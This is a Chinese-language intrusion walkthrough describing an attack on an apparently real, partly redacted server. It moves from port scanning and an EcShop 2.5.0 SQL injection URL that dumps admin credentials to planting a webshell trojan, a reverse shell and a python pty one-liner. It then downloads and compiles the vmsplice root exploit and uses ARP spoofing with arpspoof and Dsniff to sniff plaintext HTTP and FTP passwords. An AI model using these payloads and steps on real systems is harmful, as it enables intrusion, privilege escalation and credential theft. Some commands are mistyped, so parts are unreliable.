內(nèi)網(wǎng)滲透在攻擊層面，其實(shí)更趨向于社工和常規(guī)漏洞檢測的結(jié)合，為了了解網(wǎng)內(nèi)防護(hù)措施的設(shè)置是通過一步步的刺探和經(jīng)驗(yàn)積累，有時判斷出錯，也能進(jìn)入誤區(qū)。但是如果能在網(wǎng)內(nèi)進(jìn)行嗅探，則能事半功倍，處于一個對網(wǎng)內(nèi)設(shè)置完全透明的狀態(tài)。本文將從一個注點(diǎn)引發(fā)的突破，到控制整個內(nèi)網(wǎng)的全過程來跟大家討論，內(nèi)網(wǎng)的滲透嗅探術(shù)和安全防護(hù)一些內(nèi)容。

在尋找突破時，更多的是從應(yīng)用服務(wù)來，而應(yīng)用服務(wù)最直觀的信息采集，就是端口掃描，不同的應(yīng)用，開放的服務(wù)不一樣。所以，在對網(wǎng)絡(luò)進(jìn)行信息收集時，大概分為這樣兩步：

端口探測，程序指紋分析。在端口探測方面，個人喜歡用SuperScan來快速對網(wǎng)段里的應(yīng)用進(jìn)行判斷

在掌握端口信息后，就要對服務(wù)應(yīng)用程序的指紋進(jìn)行分析，主要包括版本號、已知的漏洞信息、常規(guī)配置信息、針對此應(yīng)用流行的攻擊方法等。本文試著對網(wǎng)內(nèi)一臺提供WEB服務(wù)的主機(jī)作為突破口，提交一個畸形的請求。

從上圖可以讀取以下信息：

系統(tǒng)類型：Fedora

應(yīng)用程序：apache/2.2.4

以上只是很簡單的手工對程序指紋進(jìn)行分析，當(dāng)然在針對web應(yīng)用的掃描器，還有很多，比較常用的wvs、appscan等。用輕量級的“wwwwscan來掃描：

由掃描的結(jié)果可以看到，與手工探測的結(jié)果是一致的。

通上面簡單的信息收集后，可以了解到網(wǎng)站架構(gòu)是apache+mysql+php,直接請求URL：http://61.67.xx.116/htdocs/

發(fā)現(xiàn)此站是EcShop架構(gòu)的站點(diǎn)，其使用的版本信息是V2.5.0。EcShop的版本是存在許多的注入點(diǎn)的。其中user.php文件有個注入漏洞，直接請求URL如下：

http://61.67.xx.116/htdocs/user.php?act=order_query&order_sn=’ union select 1,2,3,4,5,6,concat(user_name,0×7c,password,0×7c,email),8 from ecs_admin_user/*

獲取管理員帳號和密碼，ECShop使用的是MD5加密，直接解密。原來密碼是admin，有點(diǎn)意料之外。訪問管理后臺，修改模版處，插入一句木馬，即可得到WEBSEHLL

在獲取WEBshell權(quán)限后，就需要對系統(tǒng)進(jìn)行分析，查找Exp了。執(zhí)行命令如下：

#uname –a

返回的信息是“Linux fedora 2.6.20-1.2962.fc6 “，Linux內(nèi)核是2.6.20的。

在提權(quán)時，要用到gcc進(jìn)行編譯，刺探一下系統(tǒng)有沒有安裝，執(zhí)行命令，

#gcc –help

發(fā)現(xiàn)可以運(yùn)行g(shù)cc,并且系統(tǒng)管理員沒對使用shell和gcc進(jìn)行限制，在也是個安全缺失。

在尋找本地提權(quán)利用程序時，通常是根據(jù)系統(tǒng)版本來進(jìn)行，應(yīng)用程序的本地提權(quán)也是一樣的。在網(wǎng)上就有可供查詢的網(wǎng)站，比如http://www.milw0rm.com/網(wǎng)站

發(fā)現(xiàn)可利用的漏洞還真不少。

本地提權(quán)是需要個交互式的shell的。在本機(jī)監(jiān)聽端口如下：

利用WebShell自帶的反彈功能直接連接本地的12345端口并返回shell

連接成功后，就能得到一個apache用戶的shell

，但有時如果不能交互時，可以直接執(zhí)行，

# python –c ‘impotr pty;pty.spawn(/bin/sh);’

來得到交互的Shell,一般的系統(tǒng)都默認(rèn)安裝python

提示成功了，可以新建個目錄用來存放提權(quán)的工具。

在Linux提權(quán)大致可分為，第三方軟件漏洞、本地信任特性、內(nèi)核溢出等，比較常用的溢出率高的，當(dāng)屬內(nèi)核了。用Wget下載溢出源碼，用到的漏洞是Linux vmsplice Local Root Exploit，成功率蠻高的，gcc編譯，執(zhí)行。

成功獲取root權(quán)限，在選擇溢出利用程序時，有時需要進(jìn)行多次測試。

什么是Sniffer，sniffer是利用截獲目的的計(jì)算機(jī)通信，通過分析截獲的數(shù)據(jù)，提取敏感信息的工具。但其通過什么方法來截獲數(shù)據(jù)呢？在此之前得解釋一下arp（Address Rrsolution Protocol）協(xié)議,即地址解析協(xié)議，它位于TCP/IP協(xié)議棧中的低層協(xié)議，負(fù)責(zé)將某個IP地址解析成對應(yīng)的MAC地址。它靠維持在內(nèi)存中保存的一張表來使IP得以在網(wǎng)絡(luò)上被目標(biāo)機(jī)器應(yīng)答。在數(shù)據(jù)傳送時，IP包里就有源IP地址、源MAC地址、目標(biāo)IP地址，如果在ARP表中有相對應(yīng)的MAC地點(diǎn)，那么根據(jù)最優(yōu)選擇法，直接訪問，如果，沒有對應(yīng)的地址，就要廣播出去，在網(wǎng)內(nèi)尋找對應(yīng)的地址，如果對方的IP地址和發(fā)出的目標(biāo)IP地址相同，那么對方會發(fā)送MAC地址給源主機(jī)，，而此時，如果攻擊者也接聽到發(fā)送的IP地址，它就會仿冒目標(biāo)主機(jī)的IP地址，然后返回自己的主機(jī)的MAC地址給源主機(jī)，因?yàn)樵粗鳈C(jī)發(fā)送的IP包沒有包括目標(biāo)主機(jī)的MAC地址，而ARP表里面又沒有目標(biāo)IP和目標(biāo)MAC地址的對應(yīng)表，就會接受攻擊者的MAC而選擇與其通信，所以就此產(chǎn)生了ARP欺騙。在系統(tǒng)剛啟動時，可以在DOS下輸入命令“arp -a來查看本機(jī)arp緩存表的內(nèi)容。

我們來與IP192.168.0.5進(jìn)行通信，通信后arp緩存表就會有這樣一條MAC地址和IP對應(yīng)的記錄。

在本機(jī)多了條緩存中的IP和MAC的對應(yīng)紀(jì)錄。

Dsniff是一個著名的網(wǎng)絡(luò)嗅探工具包，其開發(fā)者是Dug Song，其開發(fā)的本意是用來揭示網(wǎng)絡(luò)通信的不安全性，方便網(wǎng)絡(luò)管理員對自己網(wǎng)絡(luò)的審計(jì)，當(dāng)然也包括滲透測試，其安裝包里某此工具，充分揭示了協(xié)議的不安全性。作為一個工具集，Dsniff包括的工具大致分為四類：

一、

純粹被動地進(jìn)行網(wǎng)絡(luò)活動監(jiān)視的工具，包括：dsniff、filesnarf、mailsnaf、msgsnarf、urlsnarf、webspy

二、

針對SSH和SSL的MITM攻擊“工具，包括sshmitm和webmitm

三、

發(fā)起主動欺騙的工具，包括：arpspoof、dnsspof、macof

四、

其它工具，包括tcpkill、tcpnice

Dsniff的官方下載：www.monkey.org/~dugsong/dsniff/ 這個是源碼包，解壓后可以看下README,提示需要五個軟件的支持：openssl、Berkeley_db、libnet、libpca、libnids

下載地址如下：

Berkeley_db: http://www.oracle.com/technology/software/products/berkeley-db/index.html

libpcap: http://www.tcpdump.org/release/libpcap-1.0.0.tar.gz

linux/epel/5/i386/dsniff-2.4-0.3.b1.el5.i386.rpm">ftp://rpmfind.net/linux/epel/5/i386/dsniff-2.4-0.3.b1.el5.i386.rpm

ftp://rpmfind.net/linux/epel/5/i386/libnet-1.1.4-1.el5.i386.rpm

ftp://rpmfind.net/linux/epel/5/i386/libnids-1.23-1.el5.i386.rpm

系統(tǒng)一般默認(rèn)都有安裝openssl、libpcap。

一、 Tar包安裝

如果下載的是源包，文件如下：openssl-0.9.7i.tar.gz、libnids-1.18.tar.gz、libpcap-0.7.2.tar.gz、libnet-1.0.2a.tar.gz、Berkeley db-4.7.25.tar.gz

a) 安裝openssl

用tar解壓軟件包手，執(zhí)行三條命令

#./config

#make

#make install

b) 安裝libpcap

#./config

#make

#make install

c) 安裝libnet

#./config

#make

#make install

d) 安裝libnids

#./config

#make

#make install

e) 安裝libnids

#./config

#make

#make install

f) 安裝Berkeley DB

#.cd build_unix

#../dist/configure

#make

#make install

g) 安裝dsniff

#./configure

#make

#make install

程序安裝好后，先查看一下網(wǎng)卡信息，然后開啟服務(wù)器IP轉(zhuǎn)發(fā)，命令如下：

# echo “1″ > /proc/sys/net/ipv4/ip_forward

先來雙向欺騙，用到arpspoof，其命令是：

#arp –t 網(wǎng)關(guān)

欺騙主機(jī)IP

arpspoof已經(jīng)開始工作了，可以用tcpdump查看一下被攻擊主機(jī)是否有數(shù)據(jù)經(jīng)過

命令如下：

#tcpdump –I eth0 host 61.67.x.115

有數(shù)據(jù)交換，說明欺騙的比較成功，然后用Dsniff開始嗅探目標(biāo)主機(jī)，命令如下。

#Dsniff –c –f /etc/dsniff/dsniff.services

這個dsniff.services自然就是保存端口和服務(wù)對應(yīng)關(guān)系的文件，如需要保存到文件，需加-w filename數(shù)據(jù)全是明文傳送的。所以數(shù)據(jù)分析完全能用肉眼發(fā)現(xiàn)。

從這條數(shù)據(jù)可以看到HTTP登錄和FTP登錄信息，帳號和密碼全是明文的。而經(jīng)過測試，通過FTP上傳的目錄正是WEB目錄，獲取WEBShell權(quán)限，繼續(xù)提權(quán)即可控制主機(jī)。Linux下的嗅探，其實(shí)更容易一些，在最近爆出的高危本地提權(quán)，不知道有多少臺主機(jī)淪陷呢？在攻與防的游戲里，系統(tǒng)管理員往往顯得如此的無助。